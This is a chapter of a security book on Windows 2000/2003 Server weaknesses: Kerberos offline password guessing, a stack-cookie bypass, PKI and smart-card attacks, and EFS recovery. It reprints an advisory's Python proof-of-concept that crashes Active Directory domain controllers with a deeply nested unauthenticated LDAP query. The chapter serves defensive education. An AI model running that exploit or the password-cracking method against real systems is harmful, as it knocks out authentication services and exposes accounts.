Windows Server is Microsoft’s contender against Unix in the server market. Windows .NET Server versions (e.g., Windows 2003 Server) were re-engineered from the Windows 2000 Server code base. As Bill Gates himself implied in his notorious “Trustworthy Computing” memo, the success of Windows Server depends on how users perceive its security.
We have written a separate book, Windows .NET Server Security Handbook (Prentice Hall, 2002), detailing the complete security architecture and defense of Windows Server. Instead of repeating that information here, we instead provide a new approach to learning the material. In this chapter, we actually show you how to break Windows 2000 Server and Windows 2003 Server security, using known or theoretical vulnerabilities in the operating system.
Although not specific to the operating system itself, we also use this chapter to discuss potential weaknesses in Windows Server security implementations. The goal is to help you think outside the box, like an attacker. (Where possible, we also show defenses or countermeasures to attacks.) The purpose of this is to help you integrate Windows Server into your security policy.
Originally scheduled for release in 2001, Windows 2003 Server was delayed several times, mostly for “security reasons” (according to Microsoft). Consider the following timeline of the Windows Server pre-release history:
Original codename: Whistler
Original expected release: late 2001
Original release candidate name: Windows 2002 Server
Trustworthy Computing Initiative release rollback: mid-2002
Final release candidate name: Windows .NET Server
Updated release date: mid-2003 (over two years of beta testing)
Last-minute name change: Windows 2003 Server
Even before its release, Windows 2003 Server was plagued with a long history of insecurity, uncertainty, and confusion.
In Windows 2003 Server, Microsoft’s implementation of Kerberos v5 is the default network protocol for authentication within a domain. The Kerberos v5 protocol verifies the identity of both the user and the network services. This dual verification is known as mutual authentication.
The Kerberos protocol was initially developed in the 1980s at the Massachusetts Institute of Technology in a project known as Athena. The name Kerberos (Cerberus in Latin) comes from the mythical three-headed dog that guards the entrance to Hades. The goal of the project was to design authentication, authorization, and auditing services (all three heads of Kerberos). However, they only implemented authentication services.
Microsoft’s implementation of Kerberos includes all three heads: authentication, authorization, and auditing. Kerberos provides strong authentication methods for client/server applications in distributed environments by taking advantage of shared secret key cryptography and multiple validation technologies.
This section reviews the components that comprise Kerberos under Windows 2003 Server, in addition to the authentication process. We also point out known attacks against Kerberos (although they are not specific to a Windows environment).
Kerberos runs on a system of tickets issued by the Key Distribution Center (KDC). To gain access to a network resource, you must have a ticket for authentication. The KDC is the main communication intermediary in this scheme and runs as a service on Windows 2003 Server domains. In fact, every Windows 2003 Server domain controller is a KDC by default. The purpose of the KDC is to grant initial tickets and Ticket-Granting Tickets (TGTs) to principals . In Kerberos, a principal can be a user, machine, service, or application. By presenting a pre-shared secret, each principal gets a unique TGT.
The KDC is comprised of two components, which are the Authentication Service (AS) and the Ticket-Granting Service (TGS). The AS is the first subprotocol activated when the user logs on to the network. The AS provides the user with a logon, a temporary session (encryption) key, and a TGT. The AS response includes two copies of the session key, one encrypted with the TGS’s key, located in the TGT, and one copy that is encrypted with the user’s key (password). This shared session key between the user and the TGS enables the single sign-on capability of Kerberos.
Tip
Unless the realm uses preauthentication, the KDC will happily issue a TGT to anyone. The ability to decrypt the message containing the shared session key is what “authenticates” a user.
When a principal wants to communicate with another principal, it presents its unique TGT to the KDC. Figure 14-1 shows an overview of the Kerberos communication sequence.
As shown in the figure, authentication is a sequential process, as follows:
The principal (in this example, the Client) first makes an authentication service request to the KDC for a Ticket-Granting Ticket (TGT).
The KDC responds to the Client with a TGT. This includes a key (ticket session key) and is encrypted with the Client’s password.
The Client uses its new TGT to request a Ticket-Granting Service (TGS) ticket in order to access the other principal (in this example, the Server).
The KDC responds to the Client by issuing a TGS ticket to the Client to access a specific resource on the Server. Note that here again a session key is generated, and two copies are made. One copy is intended for the application server and is encrypted with the application server’s key (the ticket), and the other copy is sent to the user, encrypted with the session key from the AS exchange.
The Client presents the TGS as a request to the Server.
The Server authenticates the Client by acknowledging the TGS. If mutual authentication is specified, the Client reciprocates by authenticating the Server as well. Thus, the knowledge of this shared session key between the user and the service provides mutual authentication. As long as both parties demonstrate that they know this shared key (for example, by generating a random number on the Client, sending it encrypted with the session key, and expecting that number + 1 back from the Server), then mutual authentication has occurred.
Tip
Without mutual authentication, an attacker could mount a man-in-the-middle attack and log into a machine that assumed decryption of a TGT implies successful authentication.
In Windows Server, establishing a domain implicitly creates a Kerberos realm with the same name. Using the example above, suppose the Client would like to access resources from an entirely different domain (realm), as shown in Figure 14-2. As you recall, the Client first received the TGT from the KDC in its own domain (Domain 1). However, this TGT only works in the current domain (Domain 1). If the Client wants to access a resource in a trusted domain (Domain 2), it must request a new TGT. This is known as cross-domain network access . Thus, the KDC from Domain 1 issues the Client a new TGT that provides authentication to the KDC in Domain 2.
Such cross-domain authentication is known as Kerberos referrals , which is unique to Windows. Other (non-Windows) implementations of Kerberos must realize before contacting the KDC that the requested resource is not in the local realm and must therefore ask directly for the cross-realm ticket.
The steps involved are as follows:
The Client in Domain 1 wishes to access a network resource (in our example, a network printer) in remote Domain 2. The Client has already been authenticated to the KDC in Domain 1 and has received a TGT. The Client presents the TGT to the KDC in Domain 1 and requests a TGS to access the remote network resource.
The KDC in Domain 1 cannot provide a TGS to the network resource in Domain 2, since the network resource is in a remote domain. Instead, the KDC in Domain 1 responds to the Client with a TGT for Domain 2.
The Client presents the new TGT to the KDC in Domain 2.
The KDC in Domain 2 responds with a TGS for the network resource.
The Client accesses the network resource in Domain 2 using the new TGS.
While Kerberos is a drastic improvement in security over the archaic NTLM (NT LAN Manager), Kerberos as implemented in Windows (and other operating systems) is still potentially vulnerable. For example, Frank O’Dwyer provides the following attack (included with permission).
It is well known that the LM and NTLM authentication schemes used by NT4 (and for backward compatibility in Windows 2000) are susceptible to offline password-guessing attacks. Password-cracking tools such as l0phtcrack have ably demonstrated this vulnerability. However, the question of whether it is feasible to adapt these techniques to attack the Kerberos 5 authentication scheme used by Windows Server has not received the same level of public attention. It is also worrying that the general presumption seems to be that Kerberos 5 solves the password-cracking issue once and for all, provided Kerberos alone is used in a domain. In fact, Kerberos 5 has long been known to have vulnerabilities to offline password-guessing attacks. The problem is explicitly stated in RFC 1510:
“Password guessing” attacks are not solved by Kerberos. If a user chooses a poor password, it is possible for an attacker to successfully mount an offline dictionary attack by repeatedly attempting to decrypt, with successive entries from a dictionary, messages obtained which are encrypted under a key derived from the user’s password.
We’ll investigate the feasibility of exploiting one of Kerberos’s vulnerabilities to design a point-and-click “l0phtcrack-style” password-cracking tool. We won’t actually build the tool, but we’ll consider what would be involved in making one and how well and how fast it might work in recovering passwords.
Tip
Password-based login is not the only option in Kerberos 5, nor is it the only option in Windows Server. It is also possible to log in using a public key-based scheme, PKINIT, which does not suffer from the problem outlined here. Windows Server includes support for this scheme too, with or without smart card assistance. This discussion applies only to the option that is enabled by default and is most widely used, which is to use passwords to log in.
In order to mount an offline dictionary or brute force attack, some data that can be used to verify the user’s password is needed. One way to obtain this from Kerberos 5 is to capture a login exchange by sniffing network traffic.
In Kerberos 5 a login request contains preauthentication data that is used by Kerberos to verify the user’s credentials when a TGT is issued. The basic preauthentication scheme used by Windows Server and other Kerberos implementations contains an encrypted timestamp and a cryptographic checksum, both using a key derived from the user’s password.
The timestamp in the preauthentication data is ASCII-encoded prior to encryption and is of the form YYYYMMDDHHMMSSZ (e.g., “20020304202823Z”). This provides structured plain text that can be used to verify a password attempt: if the decryption result “looks like” a timestamp, then the password attempt is almost certainly correct. A password attempt that recovers a plausible timestamp can also be verified by computing the cryptographic checksum and comparing it to the one in the preauthentication data.
Using a test Windows Server domain, we create a login attempt for the user “frank” with the password “frank”; the exchange is captured with the freely available sniffing tool WinDump (a Windows implementation of tcpdump). The captured exchange is investigated with the freely available ASN.1 decoder dumpasn1 (http://www.rtner.de/software/oid.html) and the Kerberos 5 specification.
As expected, the capture contained the following preauthentication data:
2 30 72: SEQUENCE {
4 A1 3: [1] {
6 02 1: INTEGER 2
: }
9 A2 65: [2] {
11 04 63: OCTET STRING, encapsulates {
13 30 61: SEQUENCE {
15 A0 3: [0] {
17 02 1: INTEGER 23
: }
20 A2 54: [2] {
22 04 52: OCTET STRING
: F4 08 5B A4 58 B7 33 D8 09 2E 6B 34 8E 3E 39 90
: 03 4A CF C7 0A FB A5 42 69 0B 8B C9 12 FC D7 FE
: D6 A8 48 49 3A 3F F0 D7 AF 64 1A 26 3B 71 DC C7
: 29 02 99 5D
: }
: }
: }
: }
: }The second octet string contains the encrypted timestamp that can be used to seed an offline attack. The details of this are publicly documented in the Internet Draft draft-brezak-win2k-krb-rc4-hmac-03.txt.
The Brezak Internet Draft also contains a detailed description of how the RC4 key is derived from the user’s password, as well as pseudocode for decrypting and verifying the timestamp. Implementing it is straightforward (the code here used the OpenSSL cryptographic libraries) and yields the necessary password test function for mounting an offline attack.
It is not necessary to compute the expensive embedded cryptographic checksum in order to verify a password—you can simply decrypt it and search for an ASCII string that looks like a timestamp. If the decryption does not recover a timestamp, the password tried is incorrect. If the decryption does recover a timestamp, the password is almost certainly correct, and if you wish, you can use the cryptographic checksum in the encrypted data to further verify this. As most passwords tried will be incorrect, the overhead involved in doing this extra verification after the initial check for a recovered timestamp succeeds is minimal.
In September 2003, David Litchfield discovered a method to exploit the buffer overflow prevention system in Windows 2003 Server, which we include here with his permission. The problem lies in the Windows stack protection mechanism. Microsoft incorporated this protection mechanism into Windows 2003 Server to help mitigate the risk posed by stack-based buffer overflow vulnerabilities. Like StackGuard (discussed in Chapter 5), the Microsoft mechanism places a security cookie (or “canary”) on the stack in front of the saved return address when a function is called. If a buffer local to that function is overflowed, the cookie is overwritten on the way to overwriting the saved return address. Before the function returns, the cookie is checked against an authoritative version of the cookie stored in the .data section of the module where the function resides. If the cookies do not match, then the system terminates the process because it assumes that a buffer overflow has occurred.
According to Litchfield, when a module is loaded the cookie is generated as part of its startup routine. The cookie has a high degree of randomness, which makes cookie prediction too difficult, especially if the attacker only gets one opportunity to launch the attack. This code represents the manner in which the cookie is generated. Essentially, the cookie is the result of a bunch of XOR operations on the return values of a number of functions:
#include <stdio.h>
#include <windows.h>
int main( )
{
FILETIME ft;
unsigned int Cookie=0;
unsigned int tmp=0;
unsigned int *ptr=0;
LARGE_INTEGER perfcount;
GetSystemTimeAsFileTime(&ft);
Cookie = ft.dwHighDateTime ^ ft.dwLowDateTime;
Cookie = Cookie ^ GetCurrentProcessId( );
Cookie = Cookie ^ GetCurrentThreadId( );
Cookie = Cookie ^ GetTickCount( );
QueryPerformanceCounter(&perfcount);
ptr = (unsigned int)&perfcount;
tmp = *(ptr+1) ^ *ptr;
Cookie = Cookie ^ tmp;
printf("Cookie: %.8X
",Cookie);
return 0;
}The cookie is an unsigned int, and once it has been generated it is stored in the .data section of the module. However, the .data section’s memory is writable, leaving it vulnerable to attack by overwriting this authoritative cookie with a known value and overwriting the stack cookie with the same value. As a countermeasure, Litchfield recommends that Microsoft mark the 32 bits of memory where this cookie is stored as read-only in order to prevent the attack.
Core Security Technologies uncovered another weakness in the Windows Server security architecture. According to their advisory (reprinted with permission):
Active Directory, which is an essential component of the Windows 2000 architecture, presents organizations with a directory service designed for distributed computing environments. Active Directory allows organizations to centrally manage and share information on network resources and users while acting as the central authority for network security.
The directory services provided by Active Directory are based on the Lightweight Directory Access Protocol (LDAP) and thus Active Directory objects can be stored and retrieved using the LDAP protocol. A vulnerability in Active Directory allows an attacker to crash and force a reboot of any Windows 2000 Server running the Active Directory service. The vulnerability can be triggered when an LDAP version 3 search request with more than 1,000 “AND” statements is sent to the server, resulting in a stack overflow and subsequent crash of the Lsaas.exe service. This in turn will force a domain controller to stop responding, thus making possible a denial of service attack against it. The LDAP request does not need to be authenticated.
Core goes on to provide the following sample exploit:
A “search request” created using LDAP version 3, constructed with more than 1,000 ANDs, will provoke a stack overflow, making the Lsass.exe service crash and reboot the machine within 30 seconds. To reproduce the stack overflow, you need to create a “search request” to an Active Directory server. The “search request” must search for a nonexistent machine within the Domain Controller to which you’ve previously bound. It must be composed with more than 1000 AND statements but it is supposed that OR, GE, LE and other binary operators will yield the same results.
Here’s the Python script Core provides in order to create such a request:
class ActiveDirectoryDOS( Ldap ):
def __init_ _(self):
self._s = None
self.host = '192.168.0.1'
self.basedn = 'dc=bugweek,dc=corelabs,dc=core-sdi,dc=com'
self.port = 389
self.buffer = ''
self.msg_id = 1
Ldap.__init_ _( )
def generateFilter_BinaryOp( self, filter ):
filterBuffer = asn1.OCTETSTRING(filter[1]).encode( ) +
asn1.OCTETSTRING(filter[2]).encode( )
filterBuffer = self.encapsulateHeader( filter[0], filterBuffer )
return filterBuffer
def generateFilter_RecursiveBinaryOp( self, filter, numTimes):
simpleBinOp = self.generateFilter_BinaryOp( filter )
filterBuffer = simpleBinOp
for cnt in range( 0, numTimes ):
filterBuffer = self.encapsulateHeader( self.LDAP_FILTER_AND,
filterBuffer + simpleBinOp )
return filterBuffer
def searchSub( self, filterBuffer ):
self.bindRequest( )
self.searchRequest( filterBuffer )
def run(self, host = '', basedn = '', name = '' ):
# the machine must not exist
machine_name = 'xaxax'
filterComputerNotInDir = (Ldap.LDAP_FILTER_EQUALITY,'name',machine_name)
# execute the anonymous query
print 'executing query'
filterBuffer = self.generateFilter_RecursiveBinaryOp(
filterComputerNotInDir, 7000 )
self.searchSub( filterBuffer )"The Windows 2003 Server security architecture supports Public Key Infrastructure (PKI). Although the weaknesses of PKI and smart cards have been well described and are not limited to Windows 2003 Server, Microsoft has touted PKI as key evidence that it is complying with its “Trustworthy Computing” promise. PKI provides a strong framework for authentication, but like any technology it is vulnerable to attackers. It is a mistake to think that PKI is a panacea. As always, it is important to combine PKI with other layers of defense in your security policy. In this section, we review some of the ways PKI can be defeated.
An example of a vulnerability in one implementation of PKI occurred in mid-March, 2001. VeriSign informed Microsoft that two VeriSign digital certificates had been compromised by social engineering and that they posed a spoofing vulnerability. In this case, VeriSign had issued code-signing digital certificates to an individual who fraudulently claimed to be a Microsoft employee. Because the certificates were issued with the name “Microsoft Corporation,” an attacker would be able to sign executable content using keys that prove it to be from a trusted Microsoft source. For example, the patch you thought was signed by Microsoft could really be a virus signed with the hacker’s fraudulent certificate.
Such certificates could also be used to sign ActiveX controls, Office macros, and other executable content. ActiveX controls and Office macros are particularly dangerous, since they can be delivered either though HTML-enabled email or directly through a web page. The scripts could cause harm without any intervention from the user, since a script can automatically open Word documents and ActiveX controls unless the user has implemented safeguards.
In situations like this, the bogus certificates should be have been placed immediately on a Certificate Revocation List (CRL). However, VeriSign’s code-signing certificates did not specify a CRL Distribution Point (CDP), so a client would not be able to find and use the VeriSign CRL. As a result, Microsoft issued a patch that included a CRL containing the two certificates. In addition, the Microsoft patch allowed clients to use a CRL on the local machine, instead of a CDP. Note that the above exploit was VeriSign’s fault, not Microsoft’s.
Observers have pointed out other potential weaknesses in PKI. For example, Richard Forno has shown how incomplete PKI implementations can give online shoppers a false sense of security. According to Forno, while PKI ensures that the customer’s initial transmission of information along the Internet is encrypted, the data may subsequently be decrypted and stored in clear text on the vendor’s server. Thus, a hacker can bypass the strength of PKI if he can access the clear-text database. In fact, rogue employees could easily sniff the data as it travels on the wire from within the corporate network.
When implementing PKI, consider network security from a holistic perspective. Fred Cohen sketched a list of potential vulnerabilities in his seminal paper “50 Ways to Defeat PKI” (see Section 14.10). Most of these attacks involve basic social engineering, denial-of-service, or cryptographic weakness exploitation.
Smart card hacking is not specific to Windows. However, starting with Windows 2000 Server (and continuing with later versions), integrated smart card support was also highly touted as a new security feature of Microsoft’s server architecture. Smart card attacks are therefore presented here merely as a reminder that no particular solution is infallible.
A smart card typically describes a plastic strip the size of a credit card that has an embedded microprocessor. By taking advantage of PKI, smart cards simplify solutions such as interactive logon, client authentication, and remote logon. The use of smart cards is growing rapidly.
Like any technology, smart cards are vulnerable to attack. In addition to the inherent weaknesses of PKI described above, smart cards may be vulnerable to physical attacks. This section reviews smart card technology and shows a brief sample of attacks against them. By understanding these vulnerabilities, you can make an informed decision on whether to utilize Windows 2003 Server’s streamlined support for smart cards.
The advantages that smart cards provide include:
Tamper-resistant and permanent storage of private keys
Physical isolation of secure private key computations from other parts of the system
Ease of use and portability of credentials for mobile clients
One advantage of smart cards is that they use personal identification numbers (PINs) instead of passwords. PINs do not have to follow the same rules as strong passwords, because the cards are less susceptible to brute force dictionary attacks. A short PIN is secure because an uncompromised smart card locks after a certain number of PIN inputs are incorrectly attempted. Furthermore, the PIN itself is never transmitted over the network, so it is protected from classic sniffing attacks.
Unlike a password, it is not necessary to change a PIN frequently. In fact, traditionally there has been no change-PIN functionality available through the standard desktop logon interface, as there is for passwords. The change-PIN capability is only exposed to the user when a private key operation is being performed, due to the lack of standards for how PINs are managed across card operating systems; thus, PIN management cannot be done at the operating system layer. (Note that the U.S. Government actually has standardized on a smart card, known as the Common Access Card, which includes a change-PIN feature.)
In 1998, an extensive and well-organized phone-card piracy scam demonstrated how vital proper encryption could be. As reported in Wired magazine, criminals from the Netherlands flooded Germany with millions of illegally recharged telephone debit cards. The cards, designed for Deutsche Telekom payphones, used a simple EEPROM (electrically erasable programmable read-only memory) chip developed by Siemens Corporation that deducted value from the card as minutes were used up. Ordinarily, once the credit balance reached zero, the cards would be thrown away or given to collectors. However, the Dutch pirates found a way to bypass the simple security and recharge the cards without leaving any physical evidence of tampering. Using hardware reverse engineering, pirates could understand the simple encryption stored on the chip. In addition, they found a bug that allowed the stored monetary value to be reset. The pirates bought up thousands of spent cards in bulk from collectors, recharged them, and resold them at a discount to tobacco shops and other retail outlets across Germany. The damage from this piracy was estimated to amount to $34 million.
Hardware attacks on smart cards have traditionally required access to sophisticated laboratory equipment. For example, one way to attack smart cards involves the use of an electron microscope. Using careful etching techniques, reverse engineers physically “peel away” layers of the microprocessor. Next, image processing can often give them a fair idea of the contents of the memory registers.
More sophisticated attacks are possible with the proper equipment. One project at Sandia National Laboratories involved “looking through” the chip. This attack, known as light-induced voltage alteration , involves probing operating ICs from the back with an infrared laser to which the silicon substrate is transparent. This nondestructive method induces photocurrents that allow the researcher to probe the device’s operation and to identify the logic states of individual transistors. Similarly, low-energy charge induced voltage alteration uses a low-energy electron beam generated by a scanning electron microscope to produce a surface interaction phenomenon that creates a negative charge-polarization wave. This allows the researcher to image the chip in order to identify open conductors and voltage levels without causing damage.
It is often easier to go directly after the EEPROM contents in a smart card. In EEPROM-based devices, erasing the charge stored in the floating gate of a memory cell requires an unusually high voltage, such as 12V instead of the standard 5V. If the attacker can circumvent the high voltage charge, the information is trapped.
With early pay-TV smart cards, a dedicated connection from the host interface supplied the programming voltage. This allowed attacks on systems in which cards were enabled for all channels by default, but those channels for which the subscriber did not pay were deactivated by broadcast signals. Thus, you could block the programming voltage contact on the smart card with tape or by clamping it inside the decoder using a diode. Taking this step prevented the broadcast signals from affecting the card. The subscriber could cancel his subscription without the vendor being able to cancel his service.
Once the contents of the EEPROM are trapped, there are many methods to access the goods. Attackers can use any of the following means:
Raising the supply voltage above its design limit
Lowering the supply voltage below its design limit
Resetting random memory locations using ultraviolet light in order to find the bit controlling read-protection
Exploiting weaknesses in the ROM code
Exploiting weaknesses in the EEPROM code
In order to thwart these attacks, some IC chips have sensors that force a reset when voltage or other environmental conditions go out of range. However, this can cause massive performance degradation because of false positives. Imagine if your smart card went dead every time the power surged during system startup. For this reason, such defenses are difficult to implement.
Power consumption analysis involves monitoring a smart card’s power consumption in order to assist in code breaking. A smart card does not have its own power supply; rather, it draws power from the smart card reader when it is inserted. This power is required to run the IC chip—for example, in performing cryptographic calculations.
Using sensitive equipment, it is possible to track differences in smart card power consumption. This knowledge could make it possible to recover a card’s secret key. By watching for changes in power consumption, a researcher can obtain clues because the calculations used to scramble the data depend on the values of the secret key. For instance, one simple attack involves watching an oscilloscope graph the power consumption of a card. The key is processed in binary bits that are either zeros or ones. If a chip consumes slightly more power to process a one than a zero, the key could be extracted simply by reading the peaks and valleys in the graph of power consumption.
A more sophisticated statistical attack known as differential power analysis can be used to extract the key even when it is not readily decipherable from the power consumption data. This technique allows the researcher to extract each bit of the key by making guesses and testing each several times.
Windows XP and Windows 2003 Server sport an updated version of the Encrypting File System (EFS) that was introduced in Windows Server. In this section, we include changes in the final release versions, as well as new vulnerabilities in the EFS (courtesy of Steve Light).
Windows 2003 Server has enhanced its EFS since Windows Server. For example, Windows 2003 Server now has enhanced encryption of the Offline Files database. This is an improvement over Windows Server because cached files can now be encrypted. In addition, Windows XP no longer creates a default recovery agent. Lastly, XP/Server EFS now supports multiple users encrypting a single file.
This section describes the Windows XP/Server EFS and shows you how to manage this powerful security feature.
Microsoft’s EFS is based on public key encryption and utilizes the operating system’s CryptoAPI architecture. The EFS encrypts each file with a randomly generated key that is independent of a user’s public/private key pair. The EFS automatically generates an encryption key pair and a certificate for a user if they do not exist. Temporary files are encrypted if the original file is on an NTFS volume. The EFS is built in to the operating system kernel and uses non-paged memory to store file encryption keys so that they are never in the paging file.
In Windows XP/Server, encryption is performed using either the expanded Data Encryption Standard (DESX) or Triple-DES (3DES) algorithm. Both the RSA Base and RSA Enhanced software included by cryptographic service providers (CSPs) may be used for EFS certificates and for encryption of the symmetric encryption keys.
The EFS supports file encryption on a per-file or per-folder basis. All child files and folders in an encrypted parent folder are encrypted by default. For simplicity, users should be encouraged to set one folder as encrypted and store all encrypted data in subfolders of the encrypted parent folder. However, each file has a unique encryption key, which ensures that the file remains encrypted even if it moves to an unencrypted folder on the same volume.
The EFS originally had a special account known as the Data Recovery Agent, or DRA, that allowed administrators to recover keys. However, this account is no longer included by default. Newer versions of Windows XP do not create a DRA on newly installed machines in a workgroup or in a domain. This effectively prevents offline attacks against the administrator account. If a machine is joined to a domain, all users—including local users—inherit the recovery policy from the domain. For workgroup machines, a DRA must be created manually by a user and installed. To manually create a DRA, the cipher.exe utility must be used as follows:
CIPHER /R:filename /R Generates a PFX and a CER file with a self-signed EFS recovery certificate in them. filename A filename without extensions
This command generates filename.PFX (for data recovery) and filename.CER (for use in the policy). The certificate is generated in memory and deleted when the files are generated. Once you have generated the keys, import the certificate into the local policy and store the private key in a secure location.
Steve Light discovered a weakness in which XP clients may lose access to EFS files after a password reset. Users on an XP workstation that is in a standalone (workgroup) or Windows NT 4 domain environment may lose access to EFS-encrypted files after a password reset. The default behavior of XP’s Data Protection API (DPAPI) is more restrictive when granting access to private keys. XP does not allow a user with a reset password access to that user’s private keys.
There are several workarounds available. These include:
Change the user’s password to the value from which it was reset.
Use a Password Recovery Disk.
For XP Service Pack 1, enable DPAPI behavior similar to that of Windows Server by adding the following registry entry.
HKEY_LOCAL_MACHINESOFTWAREMicrosoftCryptographyProtectProvidersdf9d8cd0- 1501-11d1-8c7a-00c04fc297eb Name: MasterKeyLegacyCompliance Type: REG_DWORD Value: 00000001
Tip
This behavior applies to non-Active Directory domain user accounts that have their passwords reset. All users changing their own passwords while on the client machine do not encounter any of the mentioned effects.
There are two kinds of Recovery Agents (RAs): an EFS RA and, in Windows 2000 (and XP), a DPAPI RA. The EFS RA is the one with which users are familiar; it is visible and configurable. The DPAPI RA offers the ability to recover from a password change.
The DPAPI RA is invisible; it is not really any user account. Imagine that every private key is encrypted with the owner’s password and the DPAPI RA’s key. When the password changes, the user cannot open the private keys. The DPAPI RA decrypts its copy of the private key and re-encrypts it with the current (new) password. Thus, a user with a reset password gains access to the EFS-encrypted files.
In XP, the local DPAPI RA is turned off. Instead, there is a “password recovery” disk. If a user forgets a password and there is no password recovery disk, the EFS data is inaccessible. In a standalone or NT4 domain environment, local or domain password resets prevent access to EFS-encrypted files. In a Microsoft AD domain, any password reset to a domain account will not prevent access to EFS-encrypted files.
In certain cases, such as in protecting highly sensitive data, some administrators opt to use an additional third-party add-on for encryption. A good example of this is Encryption Plus Hard Disk . EP Hard Disk is a program that encrypts entire disks or selected partitions at the disk driver level so that normal applications can use the secure EP Hard Disk services transparently.
Table 14-1 shows the EP Hard Disk application components, the main user-visible functions within those components, and the user role expected to use each function.
Table 14-1. EP Hard Disk component names, function names, and role names
Application component | Application function | Intended user |
|---|---|---|
User Program | Disk encryption | User |
User logon | ||
Authenti-Check or One-Time Password recovery | ||
Recovery | ||
Administrator logon | Local administrator | |
Corporate administrator | ||
Administrator Program | Administrator logon | EP Hard Disk administrator |
Configuration update | EP Hard Disk administrator | |
Recovery tool | Recovery | Local administrator |
Corporate administrator |
The data written to and read from the partition or disk is encrypted and decrypted on the fly as required, driven by operating system use of the storage device. The encryption algorithm used is the Advanced Encryption Standard (AES) in Cipher Block Chaining mode with 256-bit keys. The Disk Key, which is used to encrypt the data on the disk, is randomly generated and stored encrypted under the Disk Key Encryption Key (Disk KEK). The Disk KEK is derived from the username and password with the password-based key derivation function 2, as described in the Public Key Cryptography Standards #5.
EP Hard Disk also includes a corporate key-recovery mechanism, called One-Time Password, in which designated administrators are able to remotely assist users who forget their passwords. One-Time Password recovers the encryption key with which the disk is encrypted, allowing the user to set a new password and regain access to her data.
The administrator private key is stored when One-Time Password is installed during initial installation of the User Program. The recovery tool does not require the administrator to log on. The information exchanged between the user and the administrator during the recovery procedure is compact, so that the messages can be communicated verbally over a telephone.
There are two classes of administrator: local and corporate. Local administrators are assigned a domain of control (for example, a department within the company) by the EP Hard Disk administrator and are only able to fulfill the recovery and User Program logon functions within their domain of control. Corporate administrators can access the entire domain of control covered by the installation and one or more local administrators.
In addition, local and corporate administrators are able to log on to the User Program and gain physical access to the computer and user data. To authenticate themselves to EP Hard Disk, administrators have their own passwords.
EP Hard Disk contains an alternative key-recovery mechanism called Authenti-Check. In Authenti-Check, the user is able to recover a Disk Key without assistance from an administrator. The user is asked to provide a list of Authenti-Check questions and answers during setup of the User Program. The Authenti-Check key-recovery key is derived from the answers to the user-provided questions and used to encrypt the Disk Key. If users provide the correct answers to their Authenti-Check questions, the Disk Key is recovered. Users can then set new passwords and regain access to their data.
Users can change their passwords at any time if the EP Hard Disk administrator has allowed them to make the change. If corporate and local administrators wish to have their passwords changed, there is a password-update feature available to the EP Hard Disk administrator in the Administrator Program. This feature creates a signed password update that can be installed on existing installations of the User Program. The User Program then updates the recovery blocks with the new public keys corresponding to the new administrator passwords.
There are a number of configurable User Program options related to security, such as messages to display at various points in the EP Hard Disk dialogs (for example, phone numbers or methods of contacting the administrators), options relating to the number of incorrect entries allowed during password entry, and requirements mandating password expiration, minimum length, and so on.
The EP Hard Disk administrator configures these options into the User Program setup files, which are then installed on user workstations.
EP Hard Disk supports remote silent installation: for example, via network logon scripts. The EP Hard Disk administrator, using a signed configuration change package, can also make configuration changes to existing installations of the User Program. Both configuration changes and administrator password changes can be automatically updated on the existing installations of the User Program using, for instance, a network logon script.
A Single Sign-On feature is provided as a convenience to the user. The logon to the User Program is displayed before the Windows logon window. If the Single Sign-On option is selected, EP Hard Disk manages authentication to Windows so that the Windows logon dialog box is not displayed. EP Hard Disk stores the Windows logon name and password in an encrypted form and supplies them to Windows logon in order for Single Sign-On to function.
Windows .NET Server Security Handbook, by Cyrus Peikari and Seth Fogie. Prentice Hall, 2002.
“Hacking .NET Server,” by Cyrus Peikari and Seth Fogie. Paper presented at Defcon 10, August 2002. (http://www.airscanner.com)
“Waking the Sleeping Giant: Is Windows .NET Server Secure?” by Cyrus Peikari. Secure Computing Magazine, June 2002.
“Is .NET Server Really `Trustworthy'?” by Zubair Alexander. InformIT.co, May 2002.
“Feasibility of Attacking Windows 2000 Kerberos Passwords.” Excerpt reprinted with permission from Frank O’Dwyer.
“Active Directory Stack Overflow,” by Eduardo Arias, Gabriel Becedillas, Ricardo Quesada, and Damian Saura. Core Security Technologies Advisory, July 2003. (http://www.coresecurity.com/common/showdoc.php?idx=351&idxseccion=10)
“PKI: Breaking the Yellow Lock,” by Richard Forno. SecurityFocus, February 2002.
“50 Ways to Defeat PKI,” by Fred Cohen. (http://www.all.net)
“Erroneous VeriSign-Issued Digital Certificates Pose Spoofing Hazard.” Microsoft Security Bulletin MS01-017, March 2001.
“Tamperproofing of Chip Card,” by Ross J. Anderson. Cambridge University Computer Laboratory.
“Pirates Cash In on Weak Chips,” by James Glave. Wired News, May 1998
“Tamper Resistance—A Cautionary Note,” by Ross Anderson and Markus Kuhn. Cambridge University Computer Laboratory.